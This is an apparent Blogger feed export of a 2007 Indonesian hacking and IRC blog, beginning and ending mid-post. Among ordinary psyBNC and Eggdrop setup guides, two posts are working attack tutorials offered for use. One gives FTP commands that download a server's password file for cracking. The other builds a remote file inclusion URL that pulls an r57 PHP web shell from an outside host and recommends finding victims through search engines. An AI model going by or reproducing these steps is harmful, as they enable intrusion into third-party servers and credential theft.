index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana...&lt;br /&gt;17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi&lt;br /&gt;Original post by ping_win (kta lg males ngetik)&lt;br /&gt;&lt;br /&gt;Semoga membantu,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-2539185959229727193?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2539185959229727193'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2539185959229727193'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/cara-deface.html' title='CARA DEFACE'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-4788922924341993703</id><published>2007-09-27T10:10:00.000+07:00</published><updated>2007-09-27T10:15:27.116+07:00</updated><title type='text'>Hacking - Hacking shell via FTP</title><content type='html'>Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell. Cara ini menggunakan ftp protocol. Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server. Berikut langkah-langkahnya :&lt;br /&gt;&lt;br /&gt;1.jalankan prompt&lt;br /&gt;2.Tuliskan command untuk membuka dos command prompt&lt;br /&gt;3.tuliskan ftp server.to.hack.com (nama servernya!!)&lt;br /&gt;4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)&lt;br /&gt;5.Akan muncul password login.. tekan saja enter...&lt;br /&gt;6.sekarang ketiklah "quote user ftp" dan tekan enter&lt;br /&gt;7.lalu ketik "quote cwd ~root" tekan enter&lt;br /&gt;8.dan ketikan "quote pass ftp" tekan enter&lt;br /&gt;Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that&lt;br /&gt;9.ketiklah "cd etc" tekan enter.. untuk mendapatkan -etc directory- yg berisi file password&lt;br /&gt;10.ketiklah "get passwd" untuk mendownload passw.file ke HD mu&lt;br /&gt;&lt;br /&gt;Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:passwd dengan menggunakan notepad. Jika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-4788922924341993703?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/4788922924341993703'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/4788922924341993703'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/hacking-hacking-shell-via-ftp.html' title='Hacking - Hacking shell via FTP'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-436326807305659740</id><published>2007-09-26T13:19:00.000+07:00</published><updated>2007-09-26T13:20:02.060+07:00</updated><title type='text'>Perintah2 dalam penggunaan psyBNC</title><content type='html'>Perintah2 dalam penggunaan psyBNC&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/server (alamat shell anda)(port)&lt;br /&gt;/quote pass (password psyBNC anda)&lt;br /&gt;&lt;br /&gt;contohnya:&lt;br /&gt;/server ltnx.com 1979&lt;br /&gt;/quote pass klowor&lt;br /&gt;Setelah melakukan tahap-tahap di atas anda dapat melakukan arahan-arahan yang ada dalam psyBNC anda sebagai berikut:&lt;br /&gt;&lt;br /&gt;/BHELP&lt;br /&gt;Arahan di atas adalah untuk menampilkan menu-menu atau arahan-arahan yang ada pada psyBNC yang anda pakai tersebut.&lt;br /&gt;&lt;br /&gt;/BWHO&lt;br /&gt;Digunakan untuk melihat daftar orang-orang atau user yang sedang menggunakan psyBNC yang satu account dengan psyBNC anda.&lt;br /&gt;&lt;br /&gt;/ADDUSER&lt;br /&gt;Berfungsi untuk menambah user/pengguna baru dalam account psyBNC anda. Hanya admin psyBNC saja yang boleh memakai arahan ini.&lt;br /&gt;Contoh:&lt;br /&gt;/ADDUSER ident:username (/adduser senthod:phatygeni)&lt;br /&gt;&lt;br /&gt;/DELUSER&lt;br /&gt;Untuk menghapus user/pengguna tertentu yang ada dalam account psyBNC anda. Hanya admin yang boleh menghapus user/pengguna.&lt;br /&gt;Contoh:&lt;br /&gt;/DELUSER ident (/deluser senthod)&lt;br /&gt;&lt;br /&gt;/BKILL&lt;br /&gt;Untuk meng-kill atau memutus connection user tertentu yang ada di dalam account psyBNC anda tetapi arahan ini tidak akan&lt;br /&gt;menghapus user tersebut tapi hanya akan membuat user disconnect atau putus putus connection untuk sementara.&lt;br /&gt;Hanya admin psyBNC saja yang dapat melakukan arahan ini.&lt;br /&gt;&lt;br /&gt;/PASSWORD&lt;br /&gt;Digunakan untuk menukar password atau kata rahsia pada psyBNC anda apabila anda khuatir password anda akan mudah diterka&lt;br /&gt;oleh orang atau pun telah diketahui oleh orang yang tidak anda kehendaki.&lt;br /&gt;Contoh:&lt;br /&gt;/password&lt;br /&gt;/password ole-ole&lt;br /&gt;&lt;br /&gt;/ADDSERVER&lt;br /&gt;Untuk memasukkan server-server yang anda kehendaki, misalnya irc.dal.net 6667&lt;br /&gt;Contoh:&lt;br /&gt;/addserver irc.dal.net:6667&lt;br /&gt;&lt;br /&gt;/DELSERVER&lt;br /&gt;Digunakan untuk memadamkan server yang ada pada daftar/list pada psyBNC anda.&lt;br /&gt;Contoh:&lt;br /&gt;/delserver 1 (tergantung nomor server pada daftar server yang ada di psyBNC anda)&lt;br /&gt;&lt;br /&gt;/LISTSERVERS&lt;br /&gt;Untuk melihat daftar server yang ada pada psyBNC anda.&lt;br /&gt;&lt;br /&gt;/JUMP&lt;br /&gt;Untuk menukar atau mengganti server yang anda pakai ke server berikutnya yang ada&lt;br /&gt;pada daftar (list) pada psy-BNC anda yang anda set sewaktu anda pertama kali menggunakan PSYBNC.&lt;br /&gt;&lt;br /&gt;/BQUIT&lt;br /&gt;Untuk keluar dari network atau memutuskan sambungan dari server IRC dan nick anda akan tidak terpampang di channel sebelum anda connectkan kembali.&lt;br /&gt;&lt;br /&gt;/BCONNECT&lt;br /&gt;Untuk menyambung kembali ke network/server IRC setelah anda melakukan arahan /BQUIT supaya nick anda boleh terpampang kembali pada Channel IRC anda.&lt;br /&gt;&lt;br /&gt;/SETAWAY&lt;br /&gt;Arahan ini untuk menampilkan pesan anda ketika anda tidak di dalam IRC atau tidak online. Pesan ini akan nampak bila nick anda&lt;br /&gt;di-whois-kan oleh rakan anda atau user lain yang ingin mengetahui status anda.&lt;br /&gt;Contoh:&lt;br /&gt;/setaway (pesan anda)&lt;br /&gt;/setaway maaf saya sedang berbulan madu jadi belum boleh online dalam waktu ini&lt;br /&gt;&lt;br /&gt;/SETAWAYNICK&lt;br /&gt;Untuk mengubah atau menukar nick anda ketika anda keluar dari IRC (offline)&lt;br /&gt;Contoh:&lt;br /&gt;/setaway (nick)&lt;br /&gt;/setaway KUJANG^AFK&lt;br /&gt;&lt;br /&gt;/SETLEAVEMSG&lt;br /&gt;Untuk menampilkan teks atau pesan anda ketika anda keluar dari IRC (offline.)&lt;br /&gt;Contoh:&lt;br /&gt;/setleavemsg (pesan)&lt;br /&gt;/setleavemsg Sorry, sila tinggalkan pesanan suara anda....!!&lt;br /&gt;&lt;br /&gt;/SETUSERNAME&lt;br /&gt;Untuk mengganti user name yang tampil setelah IP address anda ketika di-whois.&lt;br /&gt;Contoh:&lt;br /&gt;/setusername (nama yang anda kehendaki)&lt;br /&gt;/setusername sontoloyo&lt;br /&gt;&lt;br /&gt;/VHOST&lt;br /&gt;Untuk mengganti Vhost (Virtual Host) atau IP address psyBNC anda ke Vhost yang anda kehendaki.&lt;br /&gt;Virtual Host atau Vhost adalah address yang anda gunakan pada ketika anda online.&lt;br /&gt;Contoh:&lt;br /&gt;/vhost (vhost yang anda kehendaki dan disediakan oleh shell anda)&lt;br /&gt;/vhost aston.crack.in.the.box.shell.org&lt;br /&gt;&lt;br /&gt;/PLAYPRIVATELOG&lt;br /&gt;Untuk menampilkan pesan-pesan untuk anda selama anda tidak berada di IRC (offline),&lt;br /&gt;pesan ini dapat dirakam secara automatik ketika seseorang melakukan msg atau private msg.&lt;br /&gt;Untuk menggunakan arahan ini anda hanya cukup me-layprivatelog maka automatik akan tampil pesan-pesan untuk anda dalam sebuah windows&lt;br /&gt;dengan nama psyBNC atau message.&lt;br /&gt;&lt;br /&gt;/ERASEPRIVATELOG&lt;br /&gt;Untuk menghapus privatelog atau pesan yang telah anda baca dan anda tidak membutuhkan pesan-pesan itu lagi.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-436326807305659740?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/436326807305659740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/436326807305659740'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/perintah2-dalam-penggunaan-psybnc.html' title='Perintah2 dalam penggunaan psyBNC'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-7492270764946678518</id><published>2007-09-26T13:00:00.000+07:00</published><updated>2007-09-26T13:01:27.756+07:00</updated><title type='text'>Install Eggdrop</title><content type='html'>Semakin banyak orang ingin tahu dan ingin belajar tentang memasang Eggdrop atau dikenal dengan BOT (robot) dalam IRC nihh gw kasih toturialnya biar lo semua bisa OK&lt;br /&gt;&lt;br /&gt;gini loe ikut aja apa perintah yang gw kasih&lt;br /&gt;&lt;br /&gt;Yang diperlukan :&lt;br /&gt;1. Shell SSH atau Injek&lt;br /&gt;2. File Eggdrop bisa lo dapat di http://www.kotagaul.net/file/bot.tar.gz&lt;br /&gt;&lt;br /&gt;Tahap intsallasi&lt;br /&gt;&lt;br /&gt;gw rasa yang namanya dah bisa main shell atau nginjek brarti udah tahu apa yang dimaksud dengan perintah find -perm 777 type -d jadi gw langsung ajarin cara install bot nya aja OK&lt;br /&gt;&lt;br /&gt;1. Setelah menentukan folder perm 777 ( yang bisa di akses) lo copy file eggdrop ke dalam folder tersebut dengan cara upload file eggdrop atau dengan menggunakan perintah wget atau lwp-download contoh :&lt;br /&gt;wget http://www.kotagaul.net/file/bot.tar.gz&lt;br /&gt;lwp-download http://www.kotagaul.net/file/bot.tar.gz&lt;br /&gt;&lt;br /&gt;2. setelah slesai di copy atau upload untuk memastikan loe masukin perintah ls -al fungsinya untuk Directory list&lt;br /&gt;&lt;br /&gt;3. Nahhh kluu loe udah lihat tampil file bot.tar.gz brarti loe sukses , sekarang loe masuk pada tahap extract file perintahnya tar -zxvf bot.tar.gz nahhh jadi itu akan keluar semua file eggdropnya dengan folder .eggdrop&lt;br /&gt;&lt;br /&gt;4. Klu udah ada .eggdrop kita tinggal masuk ajah dan install bot nya cara masuk nya ketikan perintah cd contoh :&lt;br /&gt;cd .eggdrop&lt;br /&gt;&lt;br /&gt;5. pasti dah masuk untuk memastikan ketik ls -al klu kelihatan file kotagaul.conf brarti dah bener jadi loe tinggal install aja&lt;br /&gt;&lt;br /&gt;6. sebelumnya kita haru mengetahui IP/host shell tersebut bisa dilihat dengan cara sebagai berikut ./sbin/ifconfig|grep inet itu berlaku pada shell bisa jua loe lihat pada vhost yang telah tersedia&lt;br /&gt;&lt;br /&gt;7. untuk installasi nya loee harus buat file confignya contoh :&lt;br /&gt;./andi&lt;br /&gt;./andi bot.conf botgwnih botgwnih 202.134.26.354 kotagaul a-n-d-i&lt;br /&gt;&lt;br /&gt;keterangan :&lt;br /&gt;- untuk ga perlu pake tanda pagar&lt;br /&gt;- untuk itu admin dari bot jadi nick loe&lt;br /&gt;&lt;br /&gt;8. nahh klu udah kek gitu pasti akang tampil pesan kek gini&lt;br /&gt;&lt;br /&gt;Ketik ./eggdrop -m untuk menjalankan bot anda&lt;br /&gt;&lt;br /&gt;jadi tinggal ketik aja ./eggdrop - contoh :&lt;br /&gt;&lt;br /&gt;./eggdrop -m bot.conf&lt;br /&gt;&lt;br /&gt;klu udha kek gitu loe dapat message klu bot udah di run/install selsaiii tinggal nungguin botnya join selamat yach&lt;br /&gt;&lt;br /&gt;KESIMPULAN INSTALL BOT EGGDROP&lt;br /&gt;1 wget http://www.kotagaul.net/file/bot.tar.gz&lt;br /&gt;2.tar -zxvf bot.tar.gz&lt;br /&gt;3.cd .eggdrop&lt;br /&gt;4. ./sbin/ifconfig|grep inet&lt;br /&gt;5 ./andi&lt;br /&gt;6. ./eggdrop -m&lt;br /&gt;&lt;br /&gt;andi paling cakepppp&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-7492270764946678518?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7492270764946678518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7492270764946678518'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/install-eggdrop.html' title='Install Eggdrop'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-6959334885716914028</id><published>2007-09-26T12:57:00.000+07:00</published><updated>2007-09-26T12:58:27.326+07:00</updated><title type='text'>Mengenal Shell inject dengan teknik Remote File Include Vulnerability</title><content type='html'>Mengenal shell exploite inject&lt;br /&gt;Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.&lt;br /&gt;&lt;br /&gt;Bagai mana cara mendapatkan shell tersebut?..&lt;br /&gt;Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject&lt;br /&gt;&lt;br /&gt;Bagai mana cara melihat bugs pada suatu script aplikasi pada website?..&lt;br /&gt;Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script&lt;br /&gt;&lt;br /&gt;&lt;?php require&lt;br /&gt;&lt;br /&gt;($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');&lt;br /&gt;&lt;br /&gt; ?&gt;&lt;br /&gt;&lt;br /&gt;require &lt;--- panggilan data&lt;br /&gt;&lt;br /&gt;$docroot &lt;--- variabel&lt;br /&gt;&lt;br /&gt;/FCDIRECTORY/fc_functions/fc_functions.php &lt;---&lt;br /&gt;&lt;br /&gt;directory dan file dimana ditemukan bugs&lt;br /&gt;(kerusakan atau kelemahan)&lt;br /&gt;&lt;br /&gt;jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut.&lt;br /&gt;&lt;br /&gt;sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”&lt;br /&gt;&lt;br /&gt;$docroot.'/FCDIRECTORY/fc_functions/fc_functions.php&lt;br /&gt;&lt;br /&gt;jika diputar balikan akan menjadi&lt;br /&gt;&lt;br /&gt;/FCDIRECTORY/fc_functions/fc_functions.php?docroot=&lt;br /&gt;&lt;br /&gt;Kaitan Bugs dan Link pada Website&lt;br /&gt;Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;require&lt;br /&gt;&lt;br /&gt;($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');&lt;br /&gt;&lt;br /&gt; ?&gt;&lt;br /&gt;&lt;br /&gt;sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link www.andi-a.biz/tools/shell.txt? atau www.andi-a.biz/tools/r57.txt?&lt;br /&gt;nah sekarang akan kita gabungkan akan menjadi seperti&lt;br /&gt;&lt;br /&gt;/FCDIRECTORY/fc_functions/&lt;br /&gt;fc_functions.php?docroot=[shell code]&lt;br /&gt;&lt;br /&gt;contoh:&lt;br /&gt;&lt;br /&gt;www.site.com/[path]/FCDIRECTORY/fc_functions/&lt;br /&gt;fc_functions.php?docroot=[shell code]&lt;br /&gt;&lt;br /&gt;gunakan shell code :&lt;br /&gt;&lt;br /&gt;www.andi-a.biz/tools/shell.txt?&lt;br /&gt;&lt;br /&gt;contoh :&lt;br /&gt;&lt;br /&gt;fc_functions.php?docroot=www.andi-a.biz/tools/shell.txt?&lt;br /&gt;&lt;br /&gt;jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita&lt;br /&gt;&lt;br /&gt;Screenshot Shell Inject&lt;br /&gt;&lt;br /&gt;tampilan shell code&lt;br /&gt;&lt;br /&gt;shell1.gif&lt;br /&gt;&lt;br /&gt;tampilan list directory shell code&lt;br /&gt;&lt;br /&gt;shell2.gif&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-6959334885716914028?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/6959334885716914028'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/6959334885716914028'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/mengenal-shell-inject-dengan-teknik.html' title='Mengenal Shell inject dengan teknik Remote File Include Vulnerability'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-8732086309117295949</id><published>2007-09-26T12:50:00.000+07:00</published><updated>2007-09-26T12:51:05.405+07:00</updated><title type='text'>Installasi PsyBNC pada OS Windows</title><content type='html'>=================================&lt;br /&gt;Instalasi psyBNC2.3.1 For Windows&lt;br /&gt;=================================&lt;br /&gt;DOWNLOAD&lt;br /&gt;File : psybnc2.3.1.exe&lt;br /&gt;http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe&lt;br /&gt;&lt;br /&gt;INSTALASI&lt;br /&gt;1. Extact file psybnc2.3.1.exe pada direktory C:&lt;br /&gt;2. Masuk pada direktory C:psybnc&lt;br /&gt;3. Anda juga dapat merubah portnya dengan menggunakan editor text seperti Notepad Wordpad atau&lt;br /&gt;   yang lain, C:psybnc cari file dengan nama psybnc.conf | klik kanan | Open With ..&lt;br /&gt;   pada kolom [ ] Always use this program to open this file jangan di beri tanda centang&lt;br /&gt;4. save : file ==&gt;&gt; save&lt;br /&gt;5. Klik Start ==&gt;&gt; Run ==&gt;&gt; Command&lt;br /&gt;6. Ikuti langkah berikut pada MS-DOS Prompt =&lt;br /&gt;&lt;br /&gt;Microsoft(R) Windows 98&lt;br /&gt;   (C)Copyright Microsoft Corp 1981-1999.&lt;br /&gt;&lt;br /&gt;C:WINDOWSDesktop&gt;cd..&lt;br /&gt;&lt;br /&gt;C:WINDOWS&gt;cd..&lt;br /&gt;&lt;br /&gt;C:&gt;cd psybnc..&lt;br /&gt;&lt;br /&gt;C:psybnc&gt;psybnc.exe&lt;br /&gt;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.&lt;br /&gt; ,—-.,—-.,-.  ,-.,—.,–. ,-.,—-.&lt;br /&gt; |  O ||  ,-’  / / | o ||   | || ,–’&lt;br /&gt; |  _/ _       /  | o&lt; | |   || |__&lt;br /&gt; |_|  |____/   |__|  |___||_|  _| ___|&lt;br /&gt;      Version 2.3.1 (c) 1999-2002&lt;br /&gt;              the most psychoid&lt;br /&gt;      and  the cool lam3rz Group IRCnet&lt;br /&gt;&lt;br /&gt;`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’&lt;br /&gt;Configuration File: psybnc.conf&lt;br /&gt;Language File: psyBNC Language File - English&lt;br /&gt;No logfile specified, logging to log/psybnc.log&lt;br /&gt;Listening on: 0.0.0.0 port 31337&lt;br /&gt;psyBNC2.3.1-cBtITLdDMSNp started (PID 2080107)&lt;br /&gt;&lt;br /&gt;C:psybnc&gt;&lt;br /&gt;&lt;br /&gt;7. Buka mIRC&lt;br /&gt;8. Ubah IDENT pada mIRC Option sesuai dengan keinginan Anda&lt;br /&gt;9. Ketik /server IP Komputer Anda 31337  &lt;&lt;== ini port standard (belum dirubah)&lt;br /&gt;&lt;br /&gt;-Welcome- psyBNC2.3.1&lt;br /&gt;-&lt;br /&gt;–psyBNC- Your IRC Client did not supporrrt a password. Please type /QUOTE PASS&lt;br /&gt;  yourpassword to connect.&lt;br /&gt;- &lt;br /&gt;&lt;br /&gt;8. /QUOTE PASS (pass yang Anda inginkan)&lt;br /&gt;9. /addserver mesra-e.dal.net:6667&lt;br /&gt;   /addserver hotspeed.dal.net:6667&lt;br /&gt;&lt;br /&gt;Untuk Setting psyBNC selanjutnya Anda dapat melihatnya di: &lt;br /&gt;&lt;br /&gt;http://geocities.com/erahman2001/setingpsy&lt;br /&gt;&lt;br /&gt;          =====================================================&lt;br /&gt;                     psyBNC Under Windows Anda Autorun&lt;br /&gt;          =====================================================&lt;br /&gt;&lt;br /&gt;=========================================================&lt;br /&gt;Menjalankan psyBNC Saat Memulai Windows (using start up)&lt;br /&gt;=========================================================&lt;br /&gt;&lt;br /&gt;Untuk menjalankan psyBNC saat masuk Windows secara otomatis, dapat menggunakan fasilitas&lt;br /&gt;Start Up di start menu. Caranya cukup simpel, yaitu sbb :&lt;br /&gt;&lt;br /&gt;Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip&lt;br /&gt;berikut ini.&lt;br /&gt;&lt;br /&gt;1. Buka windows Explorer, dan masuk ke direktory C:WINDOWSStart MenuProgramsStartUp&lt;br /&gt;2. Buat shortcut untuk PsyBNC dengan mengklik kanan di area yang kosong, kemudian pilih&lt;br /&gt;   New &gt;&gt; ShortCut&lt;br /&gt;3. Buat command line untuk notepad yaitu C:psybncpsybnc.exe atau pilih Browse&lt;br /&gt;4. Klik tombol Next, kemudian Finish&lt;br /&gt;5. Restart PC dan Windows akan otomatis menjalankan psybnc.&lt;br /&gt;&lt;br /&gt;========================================================&lt;br /&gt;Menjalankan psyBNC Saat Memulai Windows (using registry)&lt;br /&gt;========================================================&lt;br /&gt;&lt;br /&gt;Untuk menjalankan psyBNC saat masuk Windows secara otomatis, sebenarnya kita dapat menggunakan&lt;br /&gt;fasilitas Start Up. Tetapi ada cara yang lebih advanced, yaitu dengan menggunakan registry.&lt;br /&gt;Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip&lt;br /&gt;berikut ini.&lt;br /&gt;&lt;br /&gt;1. Buka Registry dengan Regedit : klik Start|Run| ketik Regedit | klik OK&lt;br /&gt;2. Buka key [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]&lt;br /&gt;   Pilih Edit | New | String Value, dan beri nama C:psybncpsybnc.exe&lt;br /&gt;3. Isi valuenya dengan ‘C:psybncpsybnc.exe’&lt;br /&gt;4. Restart PC&lt;br /&gt;&lt;br /&gt;=======================================================&lt;br /&gt;Menjalankan psyBNC Saat Memulai Windows (using Win.ini)&lt;br /&gt;=======================================================&lt;br /&gt;&lt;br /&gt;Ini adalah cara yang lain untuk memaksa Windows menjalankan program yang kita inginkan. Dua cara&lt;br /&gt;yang lain adalah dengan cara klasik yaitu dengan Start Up menu dan dengan cara yang advanced&lt;br /&gt;yaitu dengan menggunakan registry.&lt;br /&gt;&lt;br /&gt;Cara ini menggunakan file sistem Windows yaitu Win.ini. Berikut ini adalah hal - hal yang perlu&lt;br /&gt;pembaca lakukan untuk menjalankan program secara otomatis dengan menggunakan file Win.ini.&lt;br /&gt;Diasumsikan program yang akan dijalankan adalah psybnc.exe yang ada di direktori C:psybnc.&lt;br /&gt;&lt;br /&gt;1. Carilah file Win.ini yang berada di diirektori C:Windows&lt;br /&gt;2. Buka dengan menggunakan editor text seeperti Notepad atau yang lain&lt;br /&gt;3. Carilah entri yang bernama “load”&lt;br /&gt;4. Kemudian isi dengan ‘C:psybncpsybnc.exe’, sehingga lengkapnya&lt;br /&gt;   menjadi “load=C:psybncpsybnc.exe”&lt;br /&gt;5. Pilih menu File &gt; Save, dan restart PC&lt;br /&gt;&lt;br /&gt;Mudah khan ??&lt;br /&gt;Selamat mencoba !!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-8732086309117295949?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8732086309117295949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8732086309117295949'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/installasi-psybnc-pada-os-windows.html' title='Installasi PsyBNC pada OS Windows'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-8274317677839587606</id><published>2007-09-26T12:41:00.000+07:00</published><updated>2007-09-26T12:43:41.299+07:00</updated><title type='text'>Pasang Psybnc</title><content type='html'>ok kita ambil contoh file ini&lt;br /&gt;http://www.psybnc.info/download/psybnc2.3.2-4b.exe&lt;br /&gt;file size sekitar 750kb.&lt;br /&gt;kita taruh di c:/&lt;br /&gt;&lt;br /&gt;double klik file psybnc2.3.2-4b.exe&lt;br /&gt;lalu akan ada dialog extract to c:\psybnc\ ikuti saja dengan klik tombol extract&lt;br /&gt;setelah sukses ada kotak pesan “successfully completed the operation” klik ok&lt;br /&gt;sekarang kita double klik folder c:\psybnc&lt;br /&gt;&lt;br /&gt;disitu kita lihat ada file psybnc.exe dan ada psybnc.conf&lt;br /&gt;disini kita bisa edit dulu file psybnc.conf jika ingin merubah port nya yang&lt;br /&gt;defaultnya adalah 31337&lt;br /&gt;berikut contoh pada file psybnc.conf&lt;br /&gt;=================================&lt;br /&gt;PSYBNC.SYSTEM.PORT1=31337&lt;br /&gt;PSYBNC.SYSTEM.HOST1=*&lt;br /&gt;PSYBNC.HOSTALLOWS.ENTRY0=*;*&lt;br /&gt;=================================&lt;br /&gt;baris pertama artinya psybnc listen pada port 31337 artinya nanti kita konek ke port 3317&lt;br /&gt;barius kedua adalah ip listen bisa kita isikan ip dari ipkomputer yang kita install psybnc atau kita beri tanda bintang&lt;br /&gt;yang artinya semua ip terdeteksi di system.&lt;br /&gt;baris ketiga adalah host allow, artinya semua ip bisa loggin ke psybnc 